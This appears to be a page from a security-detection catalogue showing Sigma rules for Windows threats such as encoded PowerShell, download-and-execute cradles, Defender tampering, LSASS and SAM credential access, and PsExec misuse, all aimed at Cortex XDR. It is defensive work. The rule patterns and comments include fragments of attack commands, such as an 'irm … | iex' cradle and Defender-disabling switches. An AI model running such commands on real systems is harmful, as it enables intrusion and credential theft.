Tool
EDR / XDR
Palo Alto Cortex XDR
763 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance4
Resource Development5
Initial Access7
Execution25
Persistence31
Privilege Escalation17
Stealth63
Defense Impairment16
Credential Access26
Discovery24
Lateral Movement10
Collection11
Command and Control18
Exfiltration7
Impact10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 763
high
Moderate
High FP
PowerShell Base64 Encoded FromBase64String Cmdlet
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
view Sigma YAML
title: PowerShell Base64 Encoded FromBase64String Cmdlet
id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
status: test
description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-24
modified: 2023-04-06
tags:
- attack.stealth
- attack.t1140
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains: '::FromBase64String'
# UTF-16 LE
- CommandLine|contains:
- 'OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA'
- 'oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA'
- '6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
PowerShell Base64 Encoded IEX Cmdlet
Detects usage of a base64 encoded "IEX" cmdlet in a process command line
view Sigma YAML
title: PowerShell Base64 Encoded IEX Cmdlet
id: 88f680b8-070e-402c-ae11-d2914f2257f1
status: test
description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-23
modified: 2023-04-06
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains:
- 'IEX (['
- 'iex (['
- 'iex (New'
- 'IEX (New'
- 'IEX(['
- 'iex(['
- 'iex(New'
- 'IEX(New'
- "IEX(('"
- "iex(('"
# UTF16 LE
- CommandLine|contains:
- 'SQBFAFgAIAAoAFsA'
- 'kARQBYACAAKABbA'
- 'JAEUAWAAgACgAWw'
- 'aQBlAHgAIAAoAFsA'
- 'kAZQB4ACAAKABbA'
- 'pAGUAeAAgACgAWw'
- 'aQBlAHgAIAAoAE4AZQB3A'
- 'kAZQB4ACAAKABOAGUAdw'
- 'pAGUAeAAgACgATgBlAHcA'
- 'SQBFAFgAIAAoAE4AZQB3A'
- 'kARQBYACAAKABOAGUAdw'
- 'JAEUAWAAgACgATgBlAHcA'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
PowerShell Base64 Encoded Reflective Assembly Load
Detects base64 encoded .NET reflective loading of Assembly
view Sigma YAML
title: PowerShell Base64 Encoded Reflective Assembly Load
id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59
related:
- id: 9c0295ce-d60d-40bd-bd74-84673b7592b1
type: similar
status: test
description: Detects base64 encoded .NET reflective loading of Assembly
references:
- https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
date: 2022-03-01
modified: 2023-01-30
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1027
- attack.t1620
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# [Reflection.Assembly]::Load(
- 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'
- 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'
- 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'
# [reflection.assembly]::("Load")
- 'AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC'
- 'BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp'
- 'AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK'
# [Reflection.Assembly]::("Load")
- 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ'
- 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA'
- 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA'
# [reflection.assembly]::Load(
- 'WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'
- 'sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'
- 'bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
An attacker might use this technique via the command line to bypass defenses before executing payloads.
view Sigma YAML
title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
id: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e
related:
- id: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f
type: similar
status: experimental
description: |
Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
An attacker might use this technique via the command line to bypass defenses before executing payloads.
references:
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction
- https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952
- https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
author: 'Matt Anderson (Huntress)'
date: 2025-07-11
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection_cmdlet:
CommandLine|contains: 'Set-MpPreference'
selection_action:
CommandLine|contains:
- '-LowThreatDefaultAction'
- '-ModerateThreatDefaultAction'
- '-HighThreatDefaultAction'
- '-SevereThreatDefaultAction'
- '-ltdefac '
- '-mtdefac '
- '-htdefac '
- '-stdefac '
selection_value:
CommandLine|contains:
- 'Allow'
- '6'
- 'NoAction'
- '9'
condition: all of selection_*
falsepositives:
- Highly unlikely
level: high
Convert to SIEM query
high
Strong
High FP
PowerShell Download and Execution Cradles
Detects PowerShell download and execution cradles.
view Sigma YAML
title: PowerShell Download and Execution Cradles
id: 85b0b087-eddf-4a2b-b033-d771fa2b9775
status: test
description: Detects PowerShell download and execution cradles.
references:
- https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Florian Roth (Nextron Systems)
date: 2022-03-24
modified: 2025-07-18
tags:
- attack.execution
- attack.t1059
logsource:
product: windows
category: process_creation
detection:
selection_download:
CommandLine|contains:
- '.DownloadString('
- '.DownloadFile('
- 'Invoke-WebRequest '
- 'iwr '
- 'Invoke-RestMethod '
- 'irm ' # powershell -ep bypass -w h -c irm test.domain/ffe | iex
selection_iex:
CommandLine|contains:
- ';iex $'
- '| IEX'
- '|IEX '
- 'I`E`X'
- 'I`EX'
- 'IE`X'
- 'iex '
- 'IEX ('
- 'IEX('
- 'Invoke-Expression'
condition: all of selection_*
falsepositives:
- Some PowerShell installers were seen using similar combinations. Apply filters accordingly
level: high
Convert to SIEM query
high
Moderate
High FP
PowerShell Get-Process LSASS
Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
view Sigma YAML
title: PowerShell Get-Process LSASS
id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349
status: test
description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
references:
- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
author: Florian Roth (Nextron Systems)
date: 2021-04-23
modified: 2023-01-05
tags:
- attack.credential-access
- attack.t1552.004
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# You can add more permutation as you see fit
- 'Get-Process lsas'
- 'ps lsas'
- 'gps lsas'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
PowerShell Logging Disabled Via Registry Key Tampering
Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
view Sigma YAML
title: PowerShell Logging Disabled Via Registry Key Tampering
id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7
status: test
description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled
author: frack113
date: 2022-04-02
modified: 2023-08-17
tags:
- attack.stealth
- attack.defense-impairment
- attack.t1564.001
- attack.t1112
- attack.persistence
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains:
- '\Microsoft\Windows\PowerShell\' # PowerShell 5
- '\Microsoft\PowerShellCore\' # PowerShell 7
TargetObject|endswith:
- '\ModuleLogging\EnableModuleLogging'
- '\ScriptBlockLogging\EnableScriptBlockLogging'
- '\ScriptBlockLogging\EnableScriptBlockInvocationLogging'
- '\Transcription\EnableTranscripting'
- '\Transcription\EnableInvocationHeader'
- '\EnableScripts'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml
simulation:
- type: atomic-red-team
name: Disable PowerShell Logging via Registry
technique: T1112
atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8
Convert to SIEM query
high
Strong
High FP
PowerShell SAM Copy
Detects suspicious PowerShell scripts accessing SAM hives
view Sigma YAML
title: PowerShell SAM Copy
id: 1af57a4b-460a-4738-9034-db68b880c665
status: test
description: Detects suspicious PowerShell scripts accessing SAM hives
references:
- https://twitter.com/splinter_code/status/1420546784250769408
author: Florian Roth (Nextron Systems)
date: 2021-07-29
modified: 2023-01-06
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: process_creation
product: windows
detection:
selection_1:
CommandLine|contains|all:
- '\HarddiskVolumeShadowCopy'
- 'System32\config\sam'
selection_2:
CommandLine|contains:
- 'Copy-Item'
- 'cp $_.'
- 'cpi $_.'
- 'copy $_.'
- '.File]::Copy('
condition: all of selection*
falsepositives:
- Some rare backup scenarios
- PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
level: high
Convert to SIEM query
high
Moderate
High FP
PowerShell as a Service in Registry
Detects that a powershell code is written to the registry as a service.
view Sigma YAML
title: PowerShell as a Service in Registry
id: 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d
status: test
description: Detects that a powershell code is written to the registry as a service.
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020-10-06
modified: 2023-08-17
tags:
- attack.execution
- attack.t1569.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Services\'
TargetObject|endswith: '\ImagePath'
Details|contains:
- 'powershell'
- 'pwsh'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Powershell Base64 Encoded MpPreference Cmdlet
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
view Sigma YAML
title: Powershell Base64 Encoded MpPreference Cmdlet
id: c6fb44c6-71f5-49e6-9462-1425d328aee3
status: test
description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
references:
- https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2023-01-30
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
- 'add-mppreference '
- 'set-mppreference '
- CommandLine|contains:
# UTF16-LE
- 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Powershell Defender Disable Scan Feature
Detects requests to disable Microsoft Defender features using PowerShell commands
view Sigma YAML
title: Powershell Defender Disable Scan Feature
id: 1ec65a5f-9473-4f12-97da-622044d6df21
status: test
description: Detects requests to disable Microsoft Defender features using PowerShell commands
references:
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
- https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
- https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
author: Florian Roth (Nextron Systems)
date: 2022-03-03
modified: 2024-01-02
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection_cli_cmdlet:
CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection_cli_option:
CommandLine|contains:
- 'DisableArchiveScanning '
- 'DisableRealtimeMonitoring '
- 'DisableIOAVProtection '
- 'DisableBehaviorMonitoring '
- 'DisableBlockAtFirstSeen '
- 'DisableCatchupFullScan '
- 'DisableCatchupQuickScan '
selection_cli_value:
CommandLine|contains:
- '$true'
- ' 1 '
selection_encoded_modifier:
CommandLine|base64offset|contains:
# Note: Since this is calculating offsets casing is important
- 'disablearchivescanning '
- 'DisableArchiveScanning '
- 'disablebehaviormonitoring '
- 'DisableBehaviorMonitoring '
- 'disableblockatfirstseen '
- 'DisableBlockAtFirstSeen '
- 'disablecatchupfullscan '
- 'DisableCatchupFullScan '
- 'disablecatchupquickscan '
- 'DisableCatchupQuickScan '
- 'disableioavprotection '
- 'DisableIOAVProtection '
- 'disablerealtimemonitoring '
- 'DisableRealtimeMonitoring '
selection_encoded_direct:
CommandLine|contains:
- 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
- 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'
- 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'
- 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'
- 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'
- 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'
- 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
- 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'
- 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'
- 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'
- 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'
- 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'
- 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'
- 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'
- 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'
condition: all of selection_cli_* or 1 of selection_encoded_*
falsepositives:
- Possible administrative activity
- Other Cmdlets that may use the same parameters
level: high
Convert to SIEM query
high
Moderate
High FP
Powershell Token Obfuscation - Process Creation
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
view Sigma YAML
title: Powershell Token Obfuscation - Process Creation
id: deb9b646-a508-44ee-b7c9-d8965921c6b6
related:
- id: f3a98ce4-6164-4dd4-867c-4d83de7eca51
type: similar
status: test
description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
references:
- https://github.com/danielbohannon/Invoke-Obfuscation
author: frack113
date: 2022-12-27
modified: 2026-03-16
tags:
- attack.stealth
- attack.t1027.009
logsource:
category: process_creation
product: windows
detection:
selection:
# Examples:
# IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString
# &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString
# &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString
- CommandLine|re: '\w+`(?:\w+|-|.)`[\w+|\s]'
# - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme
- CommandLine|re: '"(?:\{\d\})+"\s*-f'
# ${e`Nv:pATh}
- CommandLine|re: '(?i)\$\{`?e`?n`?v`?:`?p`?a`?t`?h`?\}'
filter_main_envpath:
CommandLine|contains: '${env:path}'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Prefetch File Deleted
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
view Sigma YAML
title: Prefetch File Deleted
id: 0a1f9d29-6465-4776-b091-7f43b26e4c89
status: test
description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
references:
- Internal Research
- https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
author: Cedric MAURUGEON
date: 2021-09-29
modified: 2024-01-25
tags:
- attack.stealth
- attack.t1070.004
logsource:
product: windows
category: file_delete
detection:
selection:
TargetFilename|contains: ':\Windows\Prefetch\'
TargetFilename|endswith: '.pf'
filter_main_svchost:
Image|endswith: ':\windows\system32\svchost.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
PrintBrm ZIP Creation of Extraction
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
view Sigma YAML
title: PrintBrm ZIP Creation of Extraction
id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
status: test
description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
references:
- https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
author: frack113
date: 2022-05-02
tags:
- attack.command-and-control
- attack.stealth
- attack.t1105
- attack.t1564.004
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\PrintBrm.exe'
CommandLine|contains|all:
- ' -f'
- '.zip'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Process Execution From A Potentially Suspicious Folder
Detects a potentially suspicious execution from an uncommon folder.
view Sigma YAML
title: Process Execution From A Potentially Suspicious Folder
id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
status: test
description: Detects a potentially suspicious execution from an uncommon folder.
references:
- https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
- https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2019-01-16
modified: 2024-07-12
tags:
- attack.stealth
- attack.t1036
logsource:
category: process_creation
product: windows
detection:
selection:
Image|contains:
- ':\Perflogs\'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\NetworkService\'
- ':\Windows\addins\'
- ':\Windows\debug\'
- ':\Windows\Fonts\'
- ':\Windows\Help\'
- ':\Windows\IME\'
- ':\Windows\Media\'
- ':\Windows\repair\'
- ':\Windows\security\'
- ':\Windows\System32\Tasks\'
- ':\Windows\Tasks\'
- '$Recycle.bin'
- '\config\systemprofile\'
- '\Intel\Logs\'
- '\RSA\MachineKeys\'
filter_optional_ibm:
Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\'
filter_optional_citrix:
Image|startswith: 'C:\Windows\SysWOW64\config\systemprofile\Citrix\UpdaterBinaries\'
Image|endswith: '\CitrixReceiverUpdater.exe'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Process Explorer Driver Creation By Non-Sysinternals Binary
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
view Sigma YAML
title: Process Explorer Driver Creation By Non-Sysinternals Binary
id: de46c52b-0bf8-4936-a327-aace94f94ac6
status: test
description: |
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
- https://github.com/Yaxser/Backstab
- https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
- https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
author: Florian Roth (Nextron Systems)
date: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1068
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains: '\PROCEXP'
TargetFilename|endswith: '.sys'
filter_main_process_explorer:
Image|endswith:
- '\procexp.exe'
- '\procexp64.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Some false positives may occur with legitimate renamed process explorer binaries
level: high
Convert to SIEM query
high
Moderate
High FP
Ps.exe Renamed SysInternals Tool
Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
view Sigma YAML
title: Ps.exe Renamed SysInternals Tool
id: 18da1007-3f26-470f-875d-f77faf1cab31
status: test
description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
references:
- https://www.us-cert.gov/ncas/alerts/TA17-293A
author: Florian Roth (Nextron Systems)
date: 2017-10-22
modified: 2023-05-02
tags:
- attack.stealth
- attack.g0035
- attack.t1036.003
- car.2013-05-009
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'ps.exe -accepteula'
- '-s cmd /c netstat'
condition: selection
falsepositives:
- Renamed SysInternals tool
level: high
Convert to SIEM query
high
Strong
Medium FP
PsExec Service Child Process Execution as LOCAL SYSTEM
Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
view Sigma YAML
title: PsExec Service Child Process Execution as LOCAL SYSTEM
id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94
related:
- id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba
type: similar
status: test
description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
author: Florian Roth (Nextron Systems)
date: 2022-07-21
modified: 2023-02-28
tags:
- attack.execution
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage: 'C:\Windows\PSEXESVC.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: selection
falsepositives:
- Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high
Convert to SIEM query
high
Strong
High FP
